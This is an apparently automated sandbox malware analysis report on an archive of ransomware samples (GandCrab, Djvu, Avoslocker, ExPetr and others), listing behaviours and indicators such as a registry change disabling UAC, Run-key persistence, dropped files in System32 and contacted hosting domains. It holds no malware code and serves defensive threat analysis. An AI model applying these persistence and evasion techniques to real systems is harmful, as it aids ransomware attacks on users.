Malware Analysis Report

2024-10-16 03:27

Sample ID 240913-we7x1azcpj
Target RNSM00484.7z
SHA256 4aeb68c64e5569df9948d6406af74f572366a856682d5642737ebf4f5466bd73
Tags
avoslocker djvu gandcrab modiloader urelas aspackv2 backdoor defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4aeb68c64e5569df9948d6406af74f572366a856682d5642737ebf4f5466bd73

Threat Level: Known bad

The file RNSM00484.7z was found to be: Known bad.

Malicious Activity Summary

avoslocker djvu gandcrab modiloader urelas aspackv2 backdoor defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware trojan upx

Gandcrab

Avoslocker Ransomware

ModiLoader, DBatLoader

GandCrab payload

Djvu Ransomware

Detected Djvu ransomware

UAC bypass

Urelas

ModiLoader Second Stage

Renames multiple (159) files with added filename extension

Deletes shadow copies

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Modifies file permissions

UPX packed file

Checks computer location settings

ASPack v2.12-2.42

Adds Run key to start application

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Uses Tor communications

Drops file in System32 directory

Sets desktop wallpaper using registry

Drops file in Program Files directory

Program crash

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of SendNotifyMessage

Gathers network information

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

System policy modification

Views/modifies file attributes

Modifies registry key

Enumerates system info in registry

Kills process with taskkill

Modifies registry class

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-09-13 17:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-13 17:51

Reported

2024-09-13 17:55

Platform

win10v2004-20240802-en

Max time kernel

107s

Max time network

250s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00484.7z

Signatures

Avoslocker Ransomware

ransomware avoslocker

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

GandCrab payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Gandcrab

ransomware backdoor gandcrab

ModiLoader, DBatLoader

trojan modiloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe N/A

Urelas

trojan urelas

Deletes shadow copies

ransomware defense_evasion impact execution

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Renames multiple (159) files with added filename extension

ransomware

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost32.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Windows\system32\services32.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
N/A N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jnp5dz57we = "C:\\Users\\Admin\\Desktop\\00484\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe" C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchosted = "C:\\Users\\Admin\\AppData\\Roaming\\svchosted" C:\Windows\system32\reg.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Uses Tor communications

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\services32.exe C:\Users\Admin\AppData\Local\Temp\svchost32.exe N/A
File opened for modification C:\Windows\system32\services32.exe C:\Users\Admin\AppData\Local\Temp\svchost32.exe N/A
File created C:\Windows\SysWOW64\HelpMe.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe N/A
File opened for modification C:\Windows\SysWOW64\HelpMe.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe N/A
File created C:\Windows\SysWOW64\notepad.exe.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\696116166.png" C:\Windows\SysWOW64\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Internet Explorer\iexplore.exe.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\System32\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
